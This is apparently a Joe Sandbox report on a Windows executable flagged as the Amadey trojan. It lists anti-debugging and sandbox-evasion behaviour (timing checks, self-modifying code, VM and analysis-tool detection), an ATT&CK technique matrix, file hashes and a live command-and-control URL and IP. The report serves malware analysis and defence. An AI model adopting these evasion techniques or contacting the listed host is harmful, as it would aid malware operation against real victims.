Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AF7 second address: 6E30B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007F9834D75052h 0x0000000f mov cx, 5121h 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007F9834D75057h 0x0000001a adc eax, 1D9D27CEh 0x00000020 jmp 00007F9834D75059h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a jmp 00007F9834D7504Eh 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 jmp 00007F9834D7504Eh 0x00000037 jmp 00007F9834D75052h 0x0000003c popad 0x0000003d mov dl, byte ptr [ebp+14h] 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9834D7504Ah 0x00000049 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30B97 second address: 6E30BA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30BA6 second address: 6E30BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30BAC second address: 6E30BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Special instruction interceptor: First address: 74DDAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Special instruction interceptor: First address: 74DE7C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Special instruction interceptor: First address: 74B5C2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Special instruction interceptor: First address: 919F69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Special instruction interceptor: First address: 901479 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Special instruction interceptor: First address: 97A4F4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Code function: 0_2_06DA08F3 rdtsc 0_2_06DA08F3
Source: C:\Users\user\Desktop\28PCC9oa8s.exe API coverage: 4.6 %
Source: C:\Users\user\Desktop\28PCC9oa8s.exe TID: 7676 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\28PCC9oa8s.exe File Volume queried: C:\ FullSizeInformation
Source: 28PCC9oa8s.exe, 28PCC9oa8s.exe, 00000000.00000002.1711627852.00000000008D1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 28PCC9oa8s.exe Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 28PCC9oa8s.exe, 00000000.00000003.1339822785.0000000006631000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 28PCC9oa8s.exe, 00000000.00000002.1712666918.00000000014F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 28PCC9oa8s.exe, 00000000.00000003.1336590433.0000000001481000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 28PCC9oa8s.exe, 00000000.00000002.1711627852.00000000008D1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.5.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\28PCC9oa8s.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\28PCC9oa8s.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Code function: 0_2_06DA0142 Start: 06DA0381 End: 06DA01C3 0_2_06DA0142
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Code function: 0_2_06DA0123 Start: 06DA0381 End: 06DA01C3 0_2_06DA0123
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\28PCC9oa8s.exe File opened: NTICE
Source: C:\Users\user\Desktop\28PCC9oa8s.exe File opened: SICE
Source: C:\Users\user\Desktop\28PCC9oa8s.exe File opened: SIWVID
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Code function: 0_2_06DA08F3 rdtsc 0_2_06DA08F3
Source: 28PCC9oa8s.exe, 28PCC9oa8s.exe, 00000000.00000002.1711627852.00000000008D1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xProgram Manager
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\28PCC9oa8s.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: global traffic TCP traffic: 192.168.2.7:49703 -> 185.121.15.192:80
Source: global traffic TCP traffic: 192.168.2.7:49704 -> 185.121.15.192:80
Source: global traffic TCP traffic: 192.168.2.7:49710 -> 185.121.15.192:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 214 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label | Link
28PCC9oa8s.exe | 66% | ReversingLabs | Win32.Trojan.Amadey |
28PCC9oa8s.exe | 100% | Avira | TR/Crypt.TPM.Gen |
28PCC9oa8s.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5vt.top | 185.121.15.192 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://httpbin.org/ipbefore | 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.5.dr | false | | high
http://home.fivetk5vt.top/hLfzX | 28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtO | 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://curl.se/docs/alt-svc.html | 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a1 | 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://.jpg | 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lse | 28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17 | 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fivetk5vt.top/hLfzXdA | 28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      185.121.15.192 | home.fivetk5vt.top | Spain | 207046 | REDSERVICIOES | false
                                      98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1578970
                                      Start date and time:2024-12-20 17:14:12 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 34s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:28PCC9oa8s.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:8a549f15d1418fb4207aadb4ba813a36.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@2/5@10/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 20.190.147.8, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: 28PCC9oa8s.exe
                                      Time | Type | Description
                                      11:15:18 | API Interceptor | 3x Sleep call for process: 28PCC9oa8s.exe modified
                                      12:55:53 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9428709213114754
                                                          Encrypted:false
                                                          SSDEEP:96:Q5FC1z3sThGGhpJfZQXIDcQvc6QcEVcw3cE/93V+HbHg/8BRTf3Oy1oVazW0dPto:U4J3Z0BU/gju0ZrPMtwzuiFKZ24IO8i
                                                          MD5:C04C0EDD32BDA8E63E35EBB2AECA2AA1
                                                          SHA1:19D0C371D633B6BA1ED5FB2AD9F1F53CCFEFB0A4
                                                          SHA-256:8C328C48FC48B9CED6CC15CDBB80B11966DDC00CB434C0AB944E9C4E70D5FDBF
                                                          SHA-512:01E9114B44629A5F75A25023085A97575E272F280824ED3A13C5C44EB9A76A58643456A667901745F76D2B62C0512D6920A49C1E41C4AAECF3F609DCD529053C
                                                          Malicious:true
                                                          Reputation:low
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 16:15:24 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):216324
                                                          Entropy (8bit):1.3579718457104457
                                                          Encrypted:false
                                                          SSDEEP:768:8HhbixhwwEqxZBQ5ZoSEoO8kg7NDY6TXo8PJZhAW1fs1Vq4:Chexh/BSZHEovkg7NDYGo8PJZhAb1Vv
                                                          MD5:276B6FFE3A924043F3FD56D9958B6C50
                                                          SHA1:C946B5D9D98E72051CC4AAF20742B80BF57B62F6
                                                          SHA-256:AEB9E99579ECD863FE2D920B9BC365BB58465367076727C997B408CE03A05C0D
                                                          SHA-512:46F8FA818C7EF1BE8F24CD07C51E5BA8424609C3A4E61D8D09A2ADC4A0D711F00F9DAD95C7976065BE79E3EB34CBBA01897C36F75079B7052C7DD71484692AE9
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8356
                                                          Entropy (8bit):3.6962627655413716
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJb+6fd16YNKSUiUgmfPbZpri89b6Asfuem:R6lXJS6ff6YgSUiUgmfPb/6TfO
                                                          MD5:3D5FC475AB91AD61E2DFC704F2C1DB82
                                                          SHA1:537428519B45771525DD81B370EC706E1C071C0E
                                                          SHA-256:F76E2F5957E2D542D265E165DC56EF50AA8A9E220334E4C1883B927EE18CCD23
                                                          SHA-512:3D714E0E711915C25A74BB25114BC91E01A6C8218D2025F731E0E7CFC6D46BEE5841A1C1D33022030D217A46B647C18663724A1720F6574282D935D44AEA814A
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4594
                                                          Entropy (8bit):4.459177916485704
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zs0zJg77aI94LWpW8VYyYm8M4J75FUX+q8VS0eEz6Ad:uIjf6I7S67VCJUXv0bz6Ad
                                                          MD5:EF947B24D9DDA0CA7F6310524361EFC4
                                                          SHA1:47A010C4C64A851382B3009FAEB10641BA33CB36
                                                          SHA-256:24BE4F932C3DEDA0E543E1A49C3C7C2E6B6F7CF645D635634A136352ECB161DD
                                                          SHA-512:8A121A77DBEAF57F66BD9C01C1F2D198EB02354BA180378499164354F493E2E079C0E761C0D0A9DAB77BC396FDC9D4AA89EB3F41CF451004D7668817C4AB0879
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.416641919763013
                                                          Encrypted:false
                                                          SSDEEP:6144:bcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNZ5+:Ai58oSWIZBk2MM6AFBTo
                                                          MD5:756D3B4B311BE713B8518E433457285A
                                                          SHA1:64C8DA85431A270FC9D995061FCEF1DB74E1345E
                                                          SHA-256:DC0A10B0A0D96229F0A5B3575D3A63ABE5E6E510BACDAF2A19AB45D03DCC5A35
                                                          SHA-512:DD84E5DA2315198795FB82165AA307CBEAF4C8C89C2E3303600D765A20907B84FD76BA539EC37AE3983A461DD355F23FE203DE265597571EBA70194F176D1209
                                                          Malicious:false
                                                          Reputation:low
                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Entropy (8bit):7.985304301810983
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:28PCC9oa8s.exe
                                                          File size:4'450'816 bytes
                                                          MD5:8a549f15d1418fb4207aadb4ba813a36
                                                          SHA1:9019f532acc00096055788d1212842e8bec35627
                                                          SHA256:7dc314359cdb76163923b61fc91175c7a09577e37443ca9711ba9c6b33863391
                                                          SHA512:1aadc1a1eb8715f02108a6df2b28852c58399335a4760afaa9d7637612b117b118d1f7dcbb9bdbb63a067872b7ee37669379575b51b207678cf55c2d45acfbab
                                                          SSDEEP:98304:tom43DbewIxtiiOomSa347fCM65XFKZcdow9vbFgCAuj1:m7zb4CmaOfI/xTFGy
                                                          TLSH:35263367753109BBDBC69037A3239F3698F0CD5304A5B81269D2F8F38F61A44E6F2466
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0xfda000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:DYNAMIC_BASE
                                                          Time Stamp:0x6762999F [Wed Dec 18 09:45:03 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                          Instruction
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x69905f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x698000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbd844c | 0x10 | souunsyz |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xbd83fc | 0x18 | souunsyz |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x697000 | 0x284800 | 202334f002ec09df0765630a3b6e8290 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x698000 | 0x1ac | 0x200 | ace2ddaed2b562f8060924425d79cf3a | False | 0.583984375 | data | 4.58379345694674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x699000 | 0x1000 | 0x200 | 8da1d90f4e8ad8e1606b904e7bc64d29 | False | 0.166015625 | data | 1.1687723252187228 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x69a000 | 0x388000 | 0x200 | 7d4450ea36266428ba835e7e869fc295 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| souunsyz | 0xa22000 | 0x1b7000 | 0x1b6600 | 617f062e214fed4391f69211b1f2740b | False | 0.9948484726974622 | data | 7.9567248280767044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| zkkgfegk | 0xbd9000 | 0x1000 | 0x400 | b35a3d915f6f672ea18ab4d97de8d240 | False | 0.7392578125 | data | 5.871955811389945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
